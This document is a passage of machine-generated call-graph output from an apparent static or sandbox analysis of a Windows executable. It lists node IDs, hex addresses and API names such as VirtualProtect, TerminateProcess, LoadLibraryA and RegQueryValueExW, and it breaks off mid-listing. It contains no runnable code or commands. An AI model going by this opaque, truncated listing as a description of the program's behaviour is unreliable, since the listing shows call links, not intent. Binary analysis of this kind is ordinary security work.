95957->96001 95961 1029940 95958->95961 95959 1029a6e 95994 fb6270 95959->95994 95964 fb6246 CloseHandle 95961->95964 95962->95957 95962->95959 95966 102994a 95964->95966 95969 fb5745 5 API calls 95966->95969 95967 fb6246 CloseHandle 95970 1029b1e 95967->95970 95968 1029a8e 95973 fb33c6 22 API calls 95968->95973 95972 1029959 95969->95972 96002 fb6216 CloseHandle ISource 95970->96002 95975 10299c2 95972->95975 95976 102995d 95972->95976 95977 1029a9c 95973->95977 95992 fb6216 CloseHandle ISource 95975->95992 95990 fb53de 27 API calls ISource 95976->95990 96000 101cd57 30 API calls 95977->96000 95980->95947 95980->95967 95982 102996b 95991 fb53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95982->95991 95984 1029972 95984->95943 95985 101ccff 4 API calls 95984->95985 95985->95943 95987 1021e9f 95986->95987 95989 1021ea4 95986->95989 96003 1020f67 24 API calls __fread_nolock 95987->96003 95989->95950 95990->95982 95991->95984 95992->95947 95993->95943 95995 fcfe0b 22 API calls 95994->95995 95996 fb6295 95995->95996 95997 fcfddb 22 API calls 95996->95997 95998 fb62a3 95997->95998 95998->95968 95999 fba8c7 22 API calls __fread_nolock 95998->95999 95999->95968 96000->95980 96001->95980 96002->95947 96003->95989 96005 fb7510 53 API calls 96004->96005 96006 1037f90 96005->96006 96029 1037fd5 ISource 96006->96029 96042 1038cd3 96006->96042 96008 1038281 96009 103844f 96008->96009 96013 103828f 96008->96013 96083 1038ee4 60 API calls 96009->96083 96012 103845e 96012->96013 96014 103846a 96012->96014 96055 1037e86 96013->96055 96014->96029 96015 fb7510 53 API calls 96033 1038049 96015->96033 96020 10382c8 96070 fcfc70 96020->96070 96023 1038302 96077 fb63eb 22 API calls 96023->96077 96024 10382e8 96076 102359c 82 API calls __wsopen_s 96024->96076 96027 10382f3 GetCurrentProcess TerminateProcess 96027->96023 96028 1038311 96078 fb6a50 22 API calls 96028->96078 96029->95798 96031 103832a 96041 1038352 96031->96041 96079 fc04f0 22 API calls 96031->96079 96033->96008 
96033->96015 96033->96029 96074 101417d 22 API calls __fread_nolock 96033->96074 96075 103851d 42 API calls _strftime 96033->96075 96034 10384c5 96034->96029 96037 10384d9 FreeLibrary 96034->96037 96035 1038341 96080 1038b7b 75 API calls 96035->96080 96037->96029 96041->96034 96081 fc04f0 22 API calls 96041->96081 96082 fbaceb 23 API calls ISource 96041->96082 96084 1038b7b 75 API calls 96041->96084 96043 fbaec9 22 API calls 96042->96043 96044 1038cee CharLowerBuffW 96043->96044 96085 1018e54 96044->96085 96048 fba961 22 API calls 96049 1038d2a 96048->96049 96092 fb6d25 22 API calls __fread_nolock 96049->96092 96051 1038d3e 96052 fb93b2 22 API calls 96051->96052 96054 1038d48 _wcslen 96052->96054 96053 1038e5e _wcslen 96053->96033 96054->96053 96093 103851d 42 API calls _strftime 96054->96093 96056 1037eec 96055->96056 96057 1037ea1 96055->96057 96061 1039096 96056->96061 96058 fcfe0b 22 API calls 96057->96058 96059 1037ec3 96058->96059 96059->96056 96060 fcfddb 22 API calls 96059->96060 96060->96059 96062 10392ab ISource 96061->96062 96069 10390ba _strcat _wcslen 96061->96069 96062->96020 96063 fbb38f 39 API calls 96063->96069 96064 fbb567 39 API calls 96064->96069 96065 fbb6b5 39 API calls 96065->96069 96066 fb7510 53 API calls 96066->96069 96067 fdea0c 21 API calls ___std_exception_copy 96067->96069 96069->96062 96069->96063 96069->96064 96069->96065 96069->96066 96069->96067 96096 101efae 24 API calls _wcslen 96069->96096 96072 fcfc85 96070->96072 96071 fcfd1d VirtualProtect 96073 fcfceb 96071->96073 96072->96071 96072->96073 96073->96023 96073->96024 96074->96033 96075->96033 96076->96027 96077->96028 96078->96031 96079->96035 96080->96041 96081->96041 96082->96041 96083->96012 96084->96041 96086 1018e74 _wcslen 96085->96086 96087 1018f63 96086->96087 96090 1018ea9 96086->96090 96091 1018f68 96086->96091 96087->96048 96087->96054 96090->96087 96094 fcce60 41 API calls 96090->96094 96091->96087 96095 fcce60 41 API calls 96091->96095 96092->96051 96093->96053 
96094->96090 96095->96091 96096->96069 96098 fb6270 22 API calls 96097->96098 96124 fb9eb5 96098->96124 96099 fb9fd2 96127 fba4a1 96099->96127 96101 fb9fec 96101->95803 96104 fba6c3 22 API calls 96104->96124 96105 fff7c4 96139 10196e2 84 API calls __wsopen_s 96105->96139 96106 fff699 96112 fcfddb 22 API calls 96106->96112 96108 fba405 96108->96101 96140 10196e2 84 API calls __wsopen_s 96108->96140 96109 fba4a1 22 API calls 96109->96124 96114 fff754 96112->96114 96113 fff7d2 96115 fba4a1 22 API calls 96113->96115 96117 fcfe0b 22 API calls 96114->96117 96116 fff7e8 96115->96116 96116->96101 96119 fba12c __fread_nolock 96117->96119 96119->96105 96119->96108 96120 fba587 22 API calls 96120->96124 96121 fbaec9 22 API calls 96122 fba0db CharUpperBuffW 96121->96122 96135 fba673 22 API calls 96122->96135 96124->96099 96124->96104 96124->96105 96124->96106 96124->96108 96124->96109 96124->96119 96124->96120 96124->96121 96126 fb4573 41 API calls _wcslen 96124->96126 96136 fb48c8 23 API calls 96124->96136 96137 fb49bd 22 API calls __fread_nolock 96124->96137 96138 fba673 22 API calls 96124->96138 96125->95807 96126->96124 96128 fba52b 96127->96128 96134 fba4b1 __fread_nolock 96127->96134 96131 fcfe0b 22 API calls 96128->96131 96129 fcfddb 22 API calls 96130 fba4b8 96129->96130 96132 fcfddb 22 API calls 96130->96132 96133 fba4d6 96130->96133 96131->96134 96132->96133 96133->96101 96134->96129 96135->96124 96136->96124 96137->96124 96138->96124 96139->96113 96140->96101 96142 10356a4 96141->96142 96147 10356f2 96141->96147 96143 fcfe0b 22 API calls 96142->96143 96144 10356c6 96143->96144 96145 fcfddb 22 API calls 96144->96145 96144->96147 96159 1020a59 22 API calls 96144->96159 96145->96144 96147->95814 96149 1020ada 96148->96149 96150 1020b13 96148->96150 96149->96150 96151 fcfddb 22 API calls 96149->96151 96150->95841 96151->96150 96152->95825 96153->95826 96154->95830 96155->95825 96156->95842 96157->95846 96158->95825 96159->96144 96160->95702 96161->95702 96162->95698 
96163->95698 96164->95698 96165->95698 96166->95703 96167->95698 96168 1003a41 96172 10210c0 96168->96172 96170 1003a4c 96171 10210c0 53 API calls 96170->96171 96171->96170 96178 10210fa 96172->96178 96180 10210cd 96172->96180 96173 10210fc 96184 fcfa11 53 API calls 96173->96184 96174 1021101 96176 fb7510 53 API calls 96174->96176 96177 1021108 96176->96177 96179 fb6350 22 API calls 96177->96179 96178->96170 96179->96178 96180->96173 96180->96174 96180->96178 96181 10210f4 96180->96181 96183 fbb270 39 API calls 96181->96183 96183->96178 96184->96174 96185 fb1098 96190 fb42de 96185->96190 96189 fb10a7 96191 fba961 22 API calls 96190->96191 96192 fb42f5 GetVersionExW 96191->96192 96193 fb6b57 22 API calls 96192->96193 96194 fb4342 96193->96194 96195 fb93b2 22 API calls 96194->96195 96197 fb4378 96194->96197 96196 fb436c 96195->96196 96199 fb37a0 22 API calls 96196->96199 96198 fb441b GetCurrentProcess IsWow64Process 96197->96198 96205 ff37df 96197->96205 96200 fb4437 96198->96200 96199->96197 96201 fb444f LoadLibraryA 96200->96201 96202 ff3824 GetSystemInfo 96200->96202 96203 fb449c GetSystemInfo 96201->96203 96204 fb4460 GetProcAddress 96201->96204 96207 fb4476 96203->96207 96204->96203 96206 fb4470 GetNativeSystemInfo 96204->96206 96206->96207 96208 fb447a FreeLibrary 96207->96208 96209 fb109d 96207->96209 96208->96209 96210 fd00a3 29 API calls __onexit 96209->96210 96210->96189 96211 fbf7bf 96212 fbf7d3 96211->96212 96213 fbfcb6 96211->96213 96215 fbfcc2 96212->96215 96216 fcfddb 22 API calls 96212->96216 96248 fbaceb 23 API calls ISource 96213->96248 96249 fbaceb 23 API calls ISource 96215->96249 96218 fbf7e5 96216->96218 96218->96215 96219 fbf83e 96218->96219 96220 fbfd3d 96218->96220 96222 fc1310 207 API calls 96219->96222 96244 fbed9d ISource 96219->96244 96250 1021155 22 API calls 96220->96250 96243 fbec76 ISource 96222->96243 96224 fbfef7 96224->96244 96252 fba8c7 22 API calls __fread_nolock 96224->96252 96226 1004b0b 96254 102359c 82 API calls __wsopen_s 
96226->96254 96227 1004600 96227->96244 96251 fba8c7 22 API calls __fread_nolock 96227->96251 96232 fba8c7 22 API calls 96232->96243 96234 fd0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96234->96243 96235 fbfbe3 96237 1004bdc 96235->96237 96235->96244 96245 fbf3ae ISource 96235->96245 96236 fba961 22 API calls 96236->96243 96255 102359c 82 API calls __wsopen_s 96237->96255 96239 1004beb 96256 102359c 82 API calls __wsopen_s 96239->96256 96240 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96240->96243 96241 fd00a3 29 API calls pre_c_initialization 96241->96243 96242 fcfddb 22 API calls 96242->96243 96243->96224 96243->96226 96243->96227 96243->96232 96243->96234 96243->96235 96243->96236 96243->96239 96243->96240 96243->96241 96243->96242 96243->96244 96243->96245 96246 fc01e0 207 API calls 2 library calls 96243->96246 96247 fc06a0 41 API calls ISource 96243->96247 96245->96244 96253 102359c 82 API calls __wsopen_s 96245->96253 96246->96243 96247->96243 96248->96215 96249->96220 96250->96244 96251->96244 96252->96244 96253->96244 96254->96244 96255->96239 96256->96244 96257 fd03fb 96258 fd0407 ___BuildCatchObject 96257->96258 96286 fcfeb1 96258->96286 96260 fd040e 96261 fd0561 96260->96261 96264 fd0438 96260->96264 96313 fd083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96261->96313 96263 fd0568 96314 fd4e52 28 API calls _abort 96263->96314 96275 fd0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96264->96275 96297 fe247d 96264->96297 96266 fd056e 96315 fd4e04 28 API calls _abort 96266->96315 96270 fd0576 96271 fd0457 96273 fd04d8 96305 fd0959 96273->96305 96275->96273 96309 fd4e1a 38 API calls 2 library calls 96275->96309 96277 fd04de 96278 fd04f3 96277->96278 96310 fd0992 GetModuleHandleW 96278->96310 96280 fd04fa 96280->96263 96281 fd04fe 96280->96281 96282 
fd0507 96281->96282 96311 fd4df5 28 API calls _abort 96281->96311 96312 fd0040 13 API calls 2 library calls 96282->96312 96285 fd050f 96285->96271 96287 fcfeba 96286->96287 96316 fd0698 IsProcessorFeaturePresent 96287->96316 96289 fcfec6 96317 fd2c94 10 API calls 3 library calls 96289->96317 96291 fcfecf 96291->96260 96292 fcfecb 96292->96291 96318 fe2317 96292->96318 96295 fcfee6 96295->96260 96300 fe2494 96297->96300 96298 fd0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96299 fd0451 96298->96299 96299->96271 96301 fe2421 96299->96301 96300->96298 96302 fe2450 96301->96302 96303 fd0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96302->96303 96304 fe2479 96303->96304 96304->96275 96393 fd2340 96305->96393 96308 fd097f 96308->96277 96309->96273 96310->96280 96311->96282 96312->96285 96313->96263 96314->96266 96315->96270 96316->96289 96317->96292 96322 fed1f6 96318->96322 96321 fd2cbd 8 API calls 3 library calls 96321->96291 96325 fed213 96322->96325 96326 fed20f 96322->96326 96324 fcfed8 96324->96295 96324->96321 96325->96326 96328 fe4bfb 96325->96328 96340 fd0a8c 96326->96340 96329 fe4c07 ___BuildCatchObject 96328->96329 96347 fe2f5e EnterCriticalSection 96329->96347 96331 fe4c0e 96348 fe50af 96331->96348 96333 fe4c1d 96339 fe4c2c 96333->96339 96361 fe4a8f 29 API calls 96333->96361 96336 fe4c27 96362 fe4b45 GetStdHandle GetFileType 96336->96362 96337 fe4c3d __fread_nolock 96337->96325 96363 fe4c48 LeaveCriticalSection _abort 96339->96363 96341 fd0a95 96340->96341 96342 fd0a97 IsProcessorFeaturePresent 96340->96342 96341->96324 96344 fd0c5d 96342->96344 96392 fd0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96344->96392 96346 fd0d40 96346->96324 96347->96331 96349 fe50bb ___BuildCatchObject 96348->96349 96350 fe50df 96349->96350 96351 fe50c8 
96349->96351 96364 fe2f5e EnterCriticalSection 96350->96364 96372 fdf2d9 20 API calls __dosmaperr 96351->96372 96354 fe50cd 96373 fe27ec 26 API calls pre_c_initialization 96354->96373 96356 fe50d7 __fread_nolock 96356->96333 96357 fe5117 96374 fe513e LeaveCriticalSection _abort 96357->96374 96358 fe50eb 96358->96357 96365 fe5000 96358->96365 96361->96336 96362->96339 96363->96337 96364->96358 96375 fe4c7d 96365->96375 96367 fe5012 96371 fe501f 96367->96371 96382 fe3405 11 API calls 2 library calls 96367->96382 96369 fe5071 96369->96358 96383 fe29c8 96371->96383 96372->96354 96373->96356 96374->96356 96380 fe4c8a pre_c_initialization 96375->96380 96376 fe4cca 96390 fdf2d9 20 API calls __dosmaperr 96376->96390 96377 fe4cb5 RtlAllocateHeap 96379 fe4cc8 96377->96379 96377->96380 96379->96367 96380->96376 96380->96377 96389 fd4ead 7 API calls 2 library calls 96380->96389 96382->96367 96384 fe29d3 RtlFreeHeap 96383->96384 96385 fe29fc __dosmaperr 96383->96385 96384->96385 96386 fe29e8 96384->96386 96385->96369 96391 fdf2d9 20 API calls __dosmaperr 96386->96391 96388 fe29ee GetLastError 96388->96385 96389->96380 96390->96379 96391->96388 96392->96346 96394 fd096c GetStartupInfoW 96393->96394 96394->96308 96395 fb1033 96400 fb4c91 96395->96400 96399 fb1042 96401 fba961 22 API calls 96400->96401 96402 fb4cff 96401->96402 96408 fb3af0 96402->96408 96404 fb4d9c 96406 fb1038 96404->96406 96411 fb51f7 22 API calls __fread_nolock 96404->96411 96407 fd00a3 29 API calls __onexit 96406->96407 96407->96399 96412 fb3b1c 96408->96412 96411->96404 96413 fb3b0f 96412->96413 96414 fb3b29 96412->96414 96413->96404 96414->96413 96415 fb3b30 RegOpenKeyExW 96414->96415 96415->96413 96416 fb3b4a RegQueryValueExW 96415->96416 96417 fb3b6b 96416->96417 96418 fb3b80 RegCloseKey 96416->96418 96417->96418 96418->96413 96419 fb2e37 96420 fba961 22 API calls 96419->96420 96421 fb2e4d 96420->96421 96498 fb4ae3 96421->96498 96423 fb2e6b 96424 fb3a5a 24 API calls 96423->96424 96425 fb2e7f 96424->96425 
96426 fb9cb3 22 API calls 96425->96426 96427 fb2e8c 96426->96427 96512 fb4ecb 96427->96512 96430 fb2ead 96534 fba8c7 22 API calls __fread_nolock 96430->96534 96431 ff2cb0 96552 1022cf9 96431->96552 96433 ff2cc3 96435 ff2ccf 96433->96435 96578 fb4f39 96433->96578 96439 fb4f39 68 API calls 96435->96439 96436 fb2ec3 96535 fb6f88 22 API calls 96436->96535 96441 ff2ce5 96439->96441 96440 fb2ecf 96442 fb9cb3 22 API calls 96440->96442 96584 fb3084 22 API calls 96441->96584 96443 fb2edc 96442->96443 96536 fba81b 41 API calls 96443->96536 96446 fb2eec 96448 fb9cb3 22 API calls 96446->96448 96447 ff2d02 96585 fb3084 22 API calls 96447->96585 96450 fb2f12 96448->96450 96537 fba81b 41 API calls 96450->96537 96452 ff2d1e 96453 fb3a5a 24 API calls 96452->96453 96455 ff2d44 96453->96455 96454 fb2f21 96458 fba961 22 API calls 96454->96458 96586 fb3084 22 API calls 96455->96586 96457 ff2d50 96587 fba8c7 22 API calls __fread_nolock 96457->96587 96460 fb2f3f 96458->96460 96538 fb3084 22 API calls 96460->96538 96461 ff2d5e 96588 fb3084 22 API calls 96461->96588 96464 fb2f4b 96539 fd4a28 40 API calls 3 library calls 96464->96539 96465 ff2d6d 96589 fba8c7 22 API calls __fread_nolock 96465->96589 96467 fb2f59 96467->96441 96468 fb2f63 96467->96468 96540 fd4a28 40 API calls 3 library calls 96468->96540 96471 ff2d83 96590 fb3084 22 API calls 96471->96590 96472 fb2f6e 96472->96447 96474 fb2f78 96472->96474 96541 fd4a28 40 API calls 3 library calls 96474->96541 96476 ff2d90 96477 fb2f83 96477->96452 96478 fb2f8d 96477->96478 96542 fd4a28 40 API calls 3 library calls 96478->96542 96480 fb2f98 96481 fb2fdc 96480->96481 96543 fb3084 22 API calls 96480->96543 96481->96465 96482 fb2fe8 96481->96482 96482->96476 96546 fb63eb 22 API calls 96482->96546 96485 fb2fbf 96544 fba8c7 22 API calls __fread_nolock 96485->96544 96486 fb2ff8 96547 fb6a50 22 API calls 96486->96547 96489 fb2fcd 96545 fb3084 22 API calls 96489->96545 96490 fb3006 96548 fb70b0 23 API calls 96490->96548 96495 fb3021 96496 fb3065 
96495->96496 96549 fb6f88 22 API calls 96495->96549 96550 fb70b0 23 API calls 96495->96550 96551 fb3084 22 API calls 96495->96551 96499 fb4af0 __wsopen_s 96498->96499 96500 fb6b57 22 API calls 96499->96500 96501 fb4b22 96499->96501 96500->96501 96511 fb4b58 96501->96511 96591 fb4c6d 96501->96591 96503 fb9cb3 22 API calls 96505 fb4c52 96503->96505 96504 fb9cb3 22 API calls 96504->96511 96506 fb515f 22 API calls 96505->96506 96509 fb4c5e 96506->96509 96507 fb4c6d 22 API calls 96507->96511 96508 fb515f 22 API calls 96508->96511 96509->96423 96510 fb4c29 96510->96503 96510->96509 96511->96504 96511->96507 96511->96508 96511->96510 96594 fb4e90 LoadLibraryA 96512->96594 96517 ff3ccf 96520 fb4f39 68 API calls 96517->96520 96518 fb4ef6 LoadLibraryExW 96602 fb4e59 LoadLibraryA 96518->96602 96522 ff3cd6 96520->96522 96523 fb4e59 3 API calls 96522->96523 96525 ff3cde 96523->96525 96624 fb50f5 96525->96624 96526 fb4f20 96526->96525 96527 fb4f2c 96526->96527 96529 fb4f39 68 API calls 96527->96529 96531 fb2ea5 96529->96531 96531->96430 96531->96431 96533 ff3d05 96534->96436 96535->96440 96536->96446 96537->96454 96538->96464 96539->96467 96540->96472 96541->96477 96542->96480 96543->96485 96544->96489 96545->96481 96546->96486 96547->96490 96548->96495 96549->96495 96550->96495 96551->96495 96553 1022d15 96552->96553 96554 fb511f 64 API calls 96553->96554 96555 1022d29 96554->96555 96755 1022e66 96555->96755 96558 fb50f5 40 API calls 96559 1022d56 96558->96559 96560 fb50f5 40 API calls 96559->96560 96561 1022d66 96560->96561 96562 fb50f5 40 API calls 96561->96562 96563 1022d81 96562->96563 96564 fb50f5 40 API calls 96563->96564 96565 1022d9c 96564->96565 96566 fb511f 64 API calls 96565->96566 96567 1022db3 96566->96567 96568 fdea0c ___std_exception_copy 21 API calls 96567->96568 96569 1022dba 96568->96569 96570 fdea0c ___std_exception_copy 21 API calls 96569->96570 96571 1022dc4 96570->96571 96572 fb50f5 40 API calls 96571->96572 96573 1022dd8 96572->96573 96574 10228fe 27 API 
calls 96573->96574 96575 1022dee 96574->96575 96576 1022d3f 96575->96576 96761 10222ce 79 API calls 96575->96761 96576->96433 96579 fb4f43 96578->96579 96583 fb4f4a 96578->96583 96762 fde678 96579->96762 96581 fb4f6a FreeLibrary 96582 fb4f59 96581->96582 96582->96435 96583->96581 96583->96582 96584->96447 96585->96452 96586->96457 96587->96461 96588->96465 96589->96471 96590->96476 96592 fbaec9 22 API calls 96591->96592 96593 fb4c78 96592->96593 96593->96501 96595 fb4ea8 GetProcAddress 96594->96595 96596 fb4ec6 96594->96596 96597 fb4eb8 96595->96597 96599 fde5eb 96596->96599 96597->96596 96598 fb4ebf FreeLibrary 96597->96598 96598->96596 96632 fde52a 96599->96632 96601 fb4eea 96601->96517 96601->96518 96603 fb4e6e GetProcAddress 96602->96603 96604 fb4e8d 96602->96604 96605 fb4e7e 96603->96605 96607 fb4f80 96604->96607 96605->96604 96606 fb4e86 FreeLibrary 96605->96606 96606->96604 96608 fcfe0b 22 API calls 96607->96608 96609 fb4f95 96608->96609 96610 fb5722 22 API calls 96609->96610 96611 fb4fa1 __fread_nolock 96610->96611 96612 ff3d1d 96611->96612 96613 fb50a5 96611->96613 96623 fb4fdc 96611->96623 96695 102304d 74 API calls 96612->96695 96684 fb42a2 CreateStreamOnHGlobal 96613->96684 96616 ff3d22 96618 fb511f 64 API calls 96616->96618 96617 fb50f5 40 API calls 96617->96623 96619 ff3d45 96618->96619 96620 fb50f5 40 API calls 96619->96620 96622 fb506e ISource 96620->96622 96622->96526 96623->96616 96623->96617 96623->96622 96690 fb511f 96623->96690 96625 fb5107 96624->96625 96626 ff3d70 96624->96626 96717 fde8c4 96625->96717 96629 10228fe 96738 102274e 96629->96738 96631 1022919 96631->96533 96635 fde536 ___BuildCatchObject 96632->96635 96633 fde544 96657 fdf2d9 20 API calls __dosmaperr 96633->96657 96635->96633 96637 fde574 96635->96637 96636 fde549 96658 fe27ec 26 API calls pre_c_initialization 96636->96658 96639 fde579 96637->96639 96640 fde586 96637->96640 96659 fdf2d9 20 API calls __dosmaperr 96639->96659 96649 fe8061 96640->96649 96643 fde554 __fread_nolock 
96643->96601 96644 fde58f 96645 fde595 96644->96645 96646 fde5a2 96644->96646 96660 fdf2d9 20 API calls __dosmaperr 96645->96660 96661 fde5d4 LeaveCriticalSection __fread_nolock 96646->96661 96650 fe806d ___BuildCatchObject 96649->96650 96662 fe2f5e EnterCriticalSection 96650->96662 96652 fe807b 96663 fe80fb 96652->96663 96656 fe80ac __fread_nolock 96656->96644 96657->96636 96658->96643 96659->96643 96660->96643 96661->96643 96662->96652 96671 fe811e 96663->96671 96664 fe8177 96665 fe4c7d pre_c_initialization 20 API calls 96664->96665 96667 fe8180 96665->96667 96668 fe29c8 _free 20 API calls 96667->96668 96669 fe8189 96668->96669 96675 fe8088 96669->96675 96681 fe3405 11 API calls 2 library calls 96669->96681 96671->96664 96671->96675 96679 fd918d EnterCriticalSection 96671->96679 96680 fd91a1 LeaveCriticalSection 96671->96680 96672 fe81a8 96682 fd918d EnterCriticalSection 96672->96682 96676 fe80b7 96675->96676 96683 fe2fa6 LeaveCriticalSection 96676->96683 96678 fe80be 96678->96656 96679->96671 96680->96671 96681->96672 96682->96675 96683->96678 96685 fb42bc FindResourceExW 96684->96685 96689 fb42d9 96684->96689 96686 ff35ba LoadResource 96685->96686 96685->96689 96687 ff35cf SizeofResource 96686->96687 96686->96689 96688 ff35e3 LockResource 96687->96688 96687->96689 96688->96689 96689->96623 96691 fb512e 96690->96691 96692 ff3d90 96690->96692 96696 fdece3 96691->96696 96695->96616 96699 fdeaaa 96696->96699 96698 fb513c 96698->96623 96702 fdeab6 ___BuildCatchObject 96699->96702 96700 fdeac2 96712 fdf2d9 20 API calls __dosmaperr 96700->96712 96702->96700 96703 fdeae8 96702->96703 96714 fd918d EnterCriticalSection 96703->96714 96705 fdeac7 96713 fe27ec 26 API calls pre_c_initialization 96705->96713 96706 fdeaf4 96715 fdec0a 62 API calls 2 library calls 96706->96715 96709 fdeb08 96716 fdeb27 LeaveCriticalSection __fread_nolock 96709->96716 96711 fdead2 __fread_nolock 96711->96698 96712->96705 96713->96711 96714->96706 96715->96709 96716->96711 96720 fde8e1 
96717->96720 96719 fb5118 96719->96629 96721 fde8ed ___BuildCatchObject 96720->96721 96722 fde92d 96721->96722 96723 fde900 ___scrt_fastfail 96721->96723 96724 fde925 __fread_nolock 96721->96724 96735 fd918d EnterCriticalSection 96722->96735 96733 fdf2d9 20 API calls __dosmaperr 96723->96733 96724->96719 96727 fde937 96736 fde6f8 38 API calls 4 library calls 96727->96736 96728 fde91a 96734 fe27ec 26 API calls pre_c_initialization 96728->96734 96731 fde94e 96737 fde96c LeaveCriticalSection __fread_nolock 96731->96737 96733->96728 96734->96724 96735->96727 96736->96731 96737->96724 96741 fde4e8 96738->96741 96740 102275d 96740->96631 96744 fde469 96741->96744 96743 fde505 96743->96740 96745 fde48c 96744->96745 96746 fde478 96744->96746 96751 fde488 __alldvrm 96745->96751 96754 fe333f 11 API calls 2 library calls 96745->96754 96752 fdf2d9 20 API calls __dosmaperr 96746->96752 96748 fde47d 96753 fe27ec 26 API calls pre_c_initialization 96748->96753 96751->96743 96752->96748 96753->96751 96754->96751 96756 1022e7a 96755->96756 96757 1022d3b 96756->96757 96758 fb50f5 40 API calls 96756->96758 96759 10228fe 27 API calls 96756->96759 96760 fb511f 64 API calls 96756->96760 96757->96558 96757->96576 96758->96756 96759->96756 96760->96756 96761->96576 96763 fde684 ___BuildCatchObject 96762->96763 96764 fde6aa 96763->96764 96765 fde695 96763->96765 96774 fde6a5 __fread_nolock 96764->96774 96775 fd918d EnterCriticalSection 96764->96775 96792 fdf2d9 20 API calls __dosmaperr 96765->96792 96767 fde69a 96793 fe27ec 26 API calls pre_c_initialization 96767->96793 96770 fde6c6 96776 fde602 96770->96776 96772 fde6d1 96794 fde6ee LeaveCriticalSection __fread_nolock 96772->96794 96774->96583 96775->96770 96777 fde60f 96776->96777 96778 fde624 96776->96778 96827 fdf2d9 20 API calls __dosmaperr 96777->96827 96784 fde61f 96778->96784 96795 fddc0b 96778->96795 96780 fde614 96828 fe27ec 26 API calls pre_c_initialization 96780->96828 96784->96772 96788 fde646 96812 fe862f 96788->96812 96791 
fe29c8 _free 20 API calls 96791->96784 96792->96767 96793->96774 96794->96774 96796 fddc1f 96795->96796 96797 fddc23 96795->96797 96801 fe4d7a 96796->96801 96797->96796 96798 fdd955 __fread_nolock 26 API calls 96797->96798 96799 fddc43 96798->96799 96829 fe59be 62 API calls 5 library calls 96799->96829 96802 fde640 96801->96802 96803 fe4d90 96801->96803 96805 fdd955 96802->96805 96803->96802 96804 fe29c8 _free 20 API calls 96803->96804 96804->96802 96806 fdd976 96805->96806 96807 fdd961 96805->96807 96806->96788 96830 fdf2d9 20 API calls __dosmaperr 96807->96830 96809 fdd966 96831 fe27ec 26 API calls pre_c_initialization 96809->96831 96811 fdd971 96811->96788 96813 fe863e 96812->96813 96814 fe8653 96812->96814 96835 fdf2c6 20 API calls __dosmaperr 96813->96835 96816 fe868e 96814->96816 96820 fe867a 96814->96820 96837 fdf2c6 20 API calls __dosmaperr 96816->96837 96817 fe8643 96836 fdf2d9 20 API calls __dosmaperr 96817->96836 96832 fe8607 96820->96832 96821 fe8693 96838 fdf2d9 20 API calls __dosmaperr 96821->96838 96824 fde64c 96824->96784 96824->96791 96825 fe869b 96839 fe27ec 26 API calls pre_c_initialization 96825->96839 96827->96780 96828->96784 96829->96796 96830->96809 96831->96811 96840 fe8585 96832->96840 96834 fe862b 96834->96824 96835->96817 96836->96824 96837->96821 96838->96825 96839->96824 96841 fe8591 ___BuildCatchObject 96840->96841 96851 fe5147 EnterCriticalSection 96841->96851 96843 fe859f 96844 fe85c6 96843->96844 96845 fe85d1 96843->96845 96852 fe86ae 96844->96852 96867 fdf2d9 20 API calls __dosmaperr 96845->96867 96848 fe85cc 96868 fe85fb LeaveCriticalSection __wsopen_s 96848->96868 96850 fe85ee __fread_nolock 96850->96834 96851->96843 96869 fe53c4 96852->96869 96854 fe86c4 96882 fe5333 21 API calls 2 library calls 96854->96882 96855 fe86be 96855->96854 96856 fe86f6 96855->96856 96858 fe53c4 __wsopen_s 26 API calls 96855->96858 96856->96854 96859 fe53c4 __wsopen_s 26 API calls 96856->96859 96862 fe86ed 96858->96862 96863 fe8702 CloseHandle 
96859->96863 96860 fe871c 96861 fe873e 96860->96861 96883 fdf2a3 20 API calls __dosmaperr 96860->96883 96861->96848 96865 fe53c4 __wsopen_s 26 API calls 96862->96865 96863->96854 96866 fe870e GetLastError 96863->96866 96865->96856 96866->96854 96867->96848 96868->96850 96870 fe53e6 96869->96870 96871 fe53d1 96869->96871 96875 fe540b 96870->96875 96886 fdf2c6 20 API calls __dosmaperr 96870->96886 96884 fdf2c6 20 API calls __dosmaperr 96871->96884 96874 fe53d6 96885 fdf2d9 20 API calls __dosmaperr 96874->96885 96875->96855 96876 fe5416 96887 fdf2d9 20 API calls __dosmaperr 96876->96887 96879 fe53de 96879->96855 96880 fe541e 96888 fe27ec 26 API calls pre_c_initialization 96880->96888 96882->96860 96883->96861 96884->96874 96885->96879 96886->96876 96887->96880 96888->96879 96889 fb3156 96892 fb3170 96889->96892 96893 fb3187 96892->96893 96894 fb31eb 96893->96894 96895 fb318c 96893->96895 96932 fb31e9 96893->96932 96897 ff2dfb 96894->96897 96898 fb31f1 96894->96898 96899 fb3199 96895->96899 96900 fb3265 PostQuitMessage 96895->96900 96896 fb31d0 DefWindowProcW 96934 fb316a 96896->96934 96941 fb18e2 10 API calls 96897->96941 96901 fb31f8 96898->96901 96902 fb321d SetTimer RegisterWindowMessageW 96898->96902 96904 ff2e7c 96899->96904 96905 fb31a4 96899->96905 96900->96934 96906 ff2d9c 96901->96906 96907 fb3201 KillTimer 96901->96907 96909 fb3246 CreatePopupMenu 96902->96909 96902->96934 96956 101bf30 34 API calls ___scrt_fastfail 96904->96956 96910 fb31ae 96905->96910 96911 ff2e68 96905->96911 96913 ff2dd7 MoveWindow 96906->96913 96914 ff2da1 96906->96914 96937 fb30f2 Shell_NotifyIconW ___scrt_fastfail 96907->96937 96908 ff2e1c 96942 fce499 42 API calls 96908->96942 96909->96934 96918 ff2e4d 96910->96918 96919 fb31b9 96910->96919 96955 101c161 27 API calls ___scrt_fastfail 96911->96955 96913->96934 96921 ff2da7 96914->96921 96922 ff2dc6 SetFocus 96914->96922 96918->96896 96954 1010ad7 22 API calls 96918->96954 96925 fb31c4 96919->96925 96926 fb3253 96919->96926 96920 
